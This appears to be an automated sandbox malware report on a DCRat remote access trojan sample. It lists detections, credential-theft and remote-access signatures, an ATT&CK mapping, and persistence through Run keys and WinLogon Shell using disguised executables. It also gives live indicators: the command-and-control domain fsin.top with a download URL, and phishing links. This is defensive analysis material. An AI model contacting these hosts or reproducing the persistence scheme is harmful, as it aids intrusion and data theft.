                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Queries volume information: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe VolumeInformation
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Queries volume information: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe VolumeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Queries volume information: C:\Users\user\Desktop\UuIspZT5b6.exe VolumeInformation
                          Source: C:\Recovery\dllhost.exe Queries volume information: C:\Recovery\dllhost.exe VolumeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                          Stealing of Sensitive Information

                          Source: Yara match File source: 00000000.00000002.1853389921.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: UuIspZT5b6.exe PID: 6996, type: MEMORYSTR
                          Source: Yara match File source: UuIspZT5b6.exe, type: SAMPLE
                          Source: Yara match File source: 0.0.UuIspZT5b6.exe.ca0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000000.00000000.1741158644.0000000000CA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match File source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, type: DROPPED
                          Source: Yara match File source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, type: DROPPED
                          Source: Yara match File source: C:\Recovery\dllhost.exe, type: DROPPED

                          Remote Access Functionality

                          Source: Yara match File source: 00000000.00000002.1853389921.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: UuIspZT5b6.exe PID: 6996, type: MEMORYSTR
                          Source: Yara match File source: UuIspZT5b6.exe, type: SAMPLE
                          Source: Yara match File source: 0.0.UuIspZT5b6.exe.ca0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000000.00000000.1741158644.0000000000CA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match File source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, type: DROPPED
                          Source: Yara match File source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, type: DROPPED
                          Source: Yara match File source: C:\Recovery\dllhost.exe, type: DROPPED

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 1 Scheduled Task/Job | 111 Process Injection | 233 Masquerading | OS Credential Dumping | 21 Security Software Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scripting | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 131 Virtualization/Sandbox Evasion | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 DLL Side-Loading | 1 DLL Side-Loading | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 114 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 File Deletion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

[Behavior graph (image not reproduced). Behavior Graph ID: 1485769, Sample: UuIspZT5b6.exe, Startdate: 01/08/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label |
|---|---|---|---|
| UuIspZT5b6.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| UuIspZT5b6.exe | 55% | Virustotal | |
| UuIspZT5b6.exe | 100% | Avira | HEUR/AGEN.1323342 |
| UuIspZT5b6.exe | 100% | Joe Sandbox ML | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Users\user\Desktop\WkrLeKmp.log | 100% | Avira | TR/AD.BitpyRansom.lcksd |
| C:\Recovery\dllhost.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat | 100% | Avira | BAT/Delbat.C |
| C:\Users\user\Desktop\MQZNFpoe.log | 100% | Avira | HEUR/AGEN.1300079 |
| C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | 100% | Joe Sandbox ML | |
| C:\Recovery\dllhost.exe | 100% | Joe Sandbox ML | |
| C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\UZVKerGo.log | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\gSKbOmrW.log | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\CcvWVetw.log | 100% | Joe Sandbox ML | |
| C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe | 55% | Virustotal | |
| C:\Recovery\dllhost.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Recovery\dllhost.exe | 55% | Virustotal | |
| C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | 55% | Virustotal | |
| C:\Users\user\Desktop\CcvWVetw.log | 4% | ReversingLabs | |
| C:\Users\user\Desktop\CcvWVetw.log | 7% | Virustotal | |
| C:\Users\user\Desktop\CkfpANUC.log | 17% | ReversingLabs | |
| C:\Users\user\Desktop\CkfpANUC.log | 29% | Virustotal | |
| C:\Users\user\Desktop\MQZNFpoe.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\user\Desktop\MQZNFpoe.log | 22% | Virustotal | |
| C:\Users\user\Desktop\UZVKerGo.log | 8% | ReversingLabs | |
| C:\Users\user\Desktop\UZVKerGo.log | 11% | Virustotal | |
| C:\Users\user\Desktop\WkrLeKmp.log | 46% | ReversingLabs | Win32.Ransomware.Bitpy |
| C:\Users\user\Desktop\WkrLeKmp.log | 41% | Virustotal | |
| C:\Users\user\Desktop\gSKbOmrW.log | 4% | ReversingLabs | |
| C:\Users\user\Desktop\gSKbOmrW.log | 7% | Virustotal | |
| C:\Users\user\Desktop\lVerBrOi.log | 8% | ReversingLabs | |
| C:\Users\user\Desktop\lVerBrOi.log | 11% | Virustotal | |
| C:\Users\user\Desktop\pfMyjKNB.log | 17% | ReversingLabs | |
| C:\Users\user\Desktop\pfMyjKNB.log | 29% | Virustotal | |
| C:\Users\user\Desktop\tznhlkeP.log | 46% | ReversingLabs | Win32.Ransomware.Bitpy |
| C:\Users\user\Desktop\tznhlkeP.log | 41% | Virustotal | |
| C:\Users\user\Desktop\yfmgiIMl.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\user\Desktop\yfmgiIMl.log | 22% | Virustotal | |
| C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | 55% | Virustotal | |
| C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | 55% | Virustotal | |

                          No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| fsin.top | 1% | Virustotal | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
| http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
| http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
| https://contoso.com/ | 0% | URL Reputation | safe |
| https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
| https://contoso.com/License | 0% | URL Reputation | safe |
| https://contoso.com/Icon | 0% | URL Reputation | safe |
| https://aka.ms/pscore68 | 0% | URL Reputation | safe |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
| http://fsin.top/javascriptCentraldownloads.php | 0% | Avira URL Cloud | safe |
| https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
| http://fsin.top/javascriptCentraldownloads.php | 1% | Virustotal | |
| https://github.com/Pester/Pester | 1% | Virustotal | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| fsin.top | 172.67.203.2 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://fsin.top/javascriptCentraldownloads.php | true | 1%, Virustotal; Avira URL Cloud: safe | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nuget.org/NuGet.exe | powershell.exe | false | URL Reputation: safe | unknown |
| http://pesterbdd.com/images/Pester.png | powershell.exe | false | URL Reputation: safe | unknown |
| http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe | false | URL Reputation: safe | unknown |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe | false | URL Reputation: safe | unknown |
| http://schemas.xmlsoap.org/wsdl/ | powershell.exe | false | URL Reputation: safe | unknown |
| https://contoso.com/ | powershell.exe | false | URL Reputation: safe | unknown |
| https://nuget.org/nuget.exe | powershell.exe | false | URL Reputation: safe | unknown |
| https://contoso.com/License | powershell.exe | false | URL Reputation: safe | unknown |
| https://contoso.com/Icon | powershell.exe | false | URL Reputation: safe | unknown |
| https://aka.ms/pscore68 | powershell.exe | false | URL Reputation: safe | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | UuIspZT5b6.exe, powershell.exe | false | URL Reputation: safe | unknown |
| https://github.com/Pester/Pester | powershell.exe | false | 1%, Virustotal; Avira URL Cloud: safe | unknown |

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 172.67.203.2 | fsin.top | United States | 13335 | CLOUDFLARENETUS | true |

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1485769
                          Start date and time:2024-08-01 07:36:10 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 11m 10s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:56
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:UuIspZT5b6.exe
                          renamed because original name is a hash value
                          Original Sample Name:64483e064aa921f94d5b254601db7c97.exe
                          Detection:MAL
                          Classification:mal100.spre.troj.expl.evad.winEXE@48/64@1/1
                          EGA Information:
                          • Successful, ratio: 16.7%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, schtasks.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target Idle.exe, PID 7916 because it is empty
                          • Execution Graph export aborted for target TyCvtMoTOGrwUAEyotiaCQmKvM.exe, PID 7024 because it is empty
                          • Execution Graph export aborted for target UuIspZT5b6.exe, PID 1888 because it is empty
                          • Execution Graph export aborted for target dllhost.exe, PID 4192 because it is empty
                          • Execution Graph export aborted for target dllhost.exe, PID 6296 because it is empty
                          • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

| Time | Type | Description |
|---|---|---|
| 01:37:16 | API Interceptor | 188x Sleep call for process: powershell.exe modified |
| 01:37:25 | API Interceptor | 3019794x Sleep call for process: dllhost.exe modified |
| 06:37:12 | Task Scheduler | Run new task: dllhost path: "C:\Recovery\dllhost.exe" |
| 06:37:13 | Task Scheduler | Run new task: dllhostd path: "C:\Recovery\dllhost.exe" |
| 06:37:15 | Task Scheduler | Run new task: Idle path: "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" |
| 06:37:15 | Task Scheduler | Run new task: IdleI path: "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" |
| 06:37:15 | Task Scheduler | Run new task: TyCvtMoTOGrwUAEyotiaCQmKvM path: "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe" |
| 06:37:15 | Task Scheduler | Run new task: TyCvtMoTOGrwUAEyotiaCQmKvMT path: "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe" |
| 06:37:16 | Task Scheduler | Run new task: UuIspZT5b6 path: "C:\Users\user\Desktop\UuIspZT5b6.exe" |
| 06:37:16 | Task Scheduler | Run new task: UuIspZT5b6U path: "C:\Users\user\Desktop\UuIspZT5b6.exe" |
| 06:37:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe" |
| 06:37:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvM "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe" |
| 06:37:36 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" |
| 06:37:45 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6 "C:\Users\user\Desktop\UuIspZT5b6.exe" |
| 06:37:53 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe" |
| 06:38:01 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvM "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe" |
| 06:38:10 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" |
| 06:38:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6 "C:\Users\user\Desktop\UuIspZT5b6.exe" |
| 06:38:28 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe" |
| 06:38:36 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvM "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe" |
| 06:38:45 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" |
| 06:38:54 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6 "C:\Users\user\Desktop\UuIspZT5b6.exe" |
| 06:39:12 | Autostart | Run: WinLogon Shell "C:\Recovery\dllhost.exe" |
| 06:39:21 | Autostart | Run: WinLogon Shell "C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe" |
| 06:39:29 | Autostart | Run: WinLogon Shell "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" |
| 06:39:38 | Autostart | Run: WinLogon Shell "C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe" |
| 06:39:47 | Autostart | Run: WinLogon Shell "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe" |
| 06:39:55 | Autostart | Run: WinLogon Shell "C:\Users\user\Desktop\UuIspZT5b6.exe" |

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 172.67.203.2 | http://url7465.zuppler.com/ls/click?upn=sQlCsmQ0KJMo0SI1W6Ioyl-2FoT5ikhqsxBMv3QOfB3cQz6bgLhFEwwzwVns5D-2BKZCxdRWwyvvTy-2FavAiiODklxUak0y99mzPbOModJcptLDU-3D52DK_cVlN2oknvfhsPsL3xOLNHwcPSLZV-2F6CcGIvoq-2Blq9Kuvduy2Hdp-2BVwGAluzbBBAN-2FM9CFwk8hx-2BTCpYNIQZ-2Fufr5PbzN4W6MhzcjMW-2F7-2FTDumaQNi4tfwFmRen4aaQ55x-2FfjfC9kEn3phStQ-2BfzDrt60Qq0e4ROMTRuEnJNy6atR8M2lwtJOVCqxUmTnzinClSUuaWp39iSjlLVgtRWwbw-3D-3D | malicious | HTMLPhisher | |
| 172.67.203.2 | http://url7465.zuppler.com/ls/click?upn=sQlCsmQ0KJMo0SI1W6Ioyl-2FoT5ikhqsxBMv3QOfB3cQz6bgLhFEwwzwVns5D-2BKZCxOfvt0xdhAINWnX5PNw90cSe0K-2FmzjMls-2FqluGBWHUdRFClUmHP605yFE8pZANqqD4YW_m1-2B5T0y9KKTFwH14HcV3J67LqVuSV1XpXHB90F3g6scoy2QVCpXoG7fj2u0NjtWi-2Fc5sYeU44vUxuhdXtxCFCpzh45Wh6Fd-2BnCTSEufLWW1SVxItfmVv-2FVLYcDUUoSwJMnl-2BN36lkj5KiWD7VYSWeIqorNrrpod3WRMG3L38667znI4R51SVPmmjq892AOSoDo-2Ft9IbVjvEMci14Tb1bH4r3IptRfrThKrGeG9NuO6w-3D | malicious | HTMLPhisher | |

                              No context

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| CLOUDFLARENETUS | SecuriteInfo.com.Win32.PWSX-gen.30766.12718.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3 |
| CLOUDFLARENETUS | SecuriteInfo.com.Trojan.PackedNET.2944.5818.5375.exe | malicious | Snake Keylogger | 188.114.97.3 |
| CLOUDFLARENETUS | http://storage.googleapis.com/dfg153erh35ef1gdr/dfgremjflmgr.html#file.html?cbbbbcccXBYFczBrVcdc9kc8cJhS7ckzFcbbbbc | malicious | Unknown | 188.114.96.3 |
| CLOUDFLARENETUS | zBscRzEOHv.rtf | malicious | PureLog Stealer, Snake Keylogger | 188.114.96.3 |
| CLOUDFLARENETUS | https://drive.google.com/file/d/1m9FXY_yMaStETtCYX6Nl9hFeKTFaExIX/view?usp=sharing_eil_m&ts=66aa9806 | malicious | Unknown | 172.64.41.3 |
| CLOUDFLARENETUS | PmSb2GVtwC.exe | malicious | DCRat, PureLog Stealer, zgRAT | 172.67.159.202 |
| CLOUDFLARENETUS | 8Ck8T5qRcC.exe | malicious | Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT | 162.159.136.232 |
| CLOUDFLARENETUS | #4857395846#.exe | malicious | FormBook, PureLog Stealer | 104.21.47.110 |
| CLOUDFLARENETUS | http://eu.docusign.net | malicious | Unknown | 1.1.1.1 |
| CLOUDFLARENETUS | https://eu.docusign.net | malicious | Unknown | 104.18.66.57 |

                              No context

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| C:\Users\user\Desktop\CcvWVetw.log | h6t9F6kG2d.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
| C:\Users\user\Desktop\CcvWVetw.log | 4e9460942b0ebe09cd130b4154587ec6f5f14bbad4b23.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
| C:\Users\user\Desktop\CcvWVetw.log | LisectAVT_2403002A_263.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
| C:\Users\user\Desktop\CcvWVetw.log | U0KN4fzlG7.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
| C:\Users\user\Desktop\CcvWVetw.log | pGQ1F8RaiV.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
| C:\Users\user\Desktop\CcvWVetw.log | yM80f3LuOQ.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
| C:\Users\user\Desktop\CcvWVetw.log | l0OB73W8ax.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
| C:\Users\user\Desktop\CcvWVetw.log | 475bc80ba1e4ac7b2f40f2a3e1a677a2ccf1ad7f5e5d5.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
| C:\Users\user\Desktop\CcvWVetw.log | AK4VPeDc0M.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
| C:\Users\user\Desktop\CcvWVetw.log | a6zbacl43h.exe | malicious | DCRat | |

                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with very long lines (656), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):656
                                                  Entropy (8bit):5.894113455168242
                                                  Encrypted:false
                                                  SSDEEP:12:u7XCs72f1UJmStCRvfp3kVZaNrvk8WfjfLNnBfwdipnhlX+aPJjin:uTja1UY/pUV6cfLpBf7jXFji
                                                  MD5:D4618054A25EB002E3B42A67700D7E7C
                                                  SHA1:FEB3C49C1C86B8B72280F079F4440F3A655F90D9
                                                  SHA-256:8C9CE07F85C0B630820F3D17254A18F939D28E25A57EAEAD9BE51EC134132F23
                                                  SHA-512:66E6FBCFC6363568C7524981B613541E385371C53D12139CA4FBB3CC3F1BEBEBFB038F04D0036E884FB6B66BA081859531C7123B21301E8B3BA1790C788EE040
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1879040
                                                  Entropy (8bit):7.521285879994311
                                                  Encrypted:false
